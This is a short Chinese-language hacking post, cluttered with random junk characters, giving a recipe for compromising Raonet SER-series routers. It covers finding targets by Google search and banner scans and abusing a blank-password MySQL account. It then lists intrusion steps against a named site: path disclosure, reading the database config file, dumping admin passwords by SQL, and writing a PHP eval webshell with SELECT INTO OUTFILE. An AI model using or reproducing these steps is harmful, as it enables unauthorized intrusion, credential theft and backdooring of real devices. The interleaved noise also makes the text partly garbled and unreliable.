寻找存在漏洞的路由器方法:) N7 R8 Q, l7 \5 f3 x2 H8 \/ _
$ f1 m9 l# W a% ~1:google搜索'Raonet Subscriber Ethernet Router'
5 c' h; q7 k9 b& X# T1 j o
+ }+ m3 c6 L/ E V7 N2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
% A% f1 L7 _; C! c5 g5 D5 R- s: B2 Z# K7 K/ I! |$ h6 J. l& D0 q
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
- b# _- O0 }# y9 P0 p+ P( p* o+ D+ Q+ u1 ]& U3 H4 u" v
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
2 C T L8 @. W3 `* ~
9 A; l: \9 @+ V
8 Q4 g; \: R* B- t, k2 g q3 J: X) c$ @$ ?$ S, Q. F2 _7 o
入侵步骤:
, \, l1 H, p8 P6 H3 u, v1 B
c' }4 o9 p f4 {0 Q6 |, u1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php& B8 t+ @, w) i
* A0 l3 g) A- A7 N* I+ M! e2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc4 @1 K( I! {$ `- |1 _$ j" ]# Z
3:得到密码后连接,查看GUI管理密码:# W5 w8 o! g$ R5 H1 o. Q
use ser_500$ V K% ~ F% i" b
select id,passwd from user;
" @9 _- R) T: u5 Y% N4:通过数据库写入webshell,执行命令:
+ ]1 B* u3 f/ K2 duse mysql;
; S4 p0 B U' X+ f$ Ycreate table ok(cmd TEXT);
6 o+ F: U3 k: o" [1 qinsert into ok values("<?php @eval($_POST[cmd])?>");
6 m d( P4 z2 H8 L. l. H qselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";) c! M4 {+ Y' `7 o" a; R K
drop table ok;
; x8 s p2 p+ c) l2 B- I3 |: k" ]* H3 Y/ }. X3 }
5:连接后门shell.php
, q$ r- q+ Z- V+ ]
6 A: l7 z3 Z L; n6. 搞定!
, s e( x/ o7 |
# @: B6 a1 j3 a |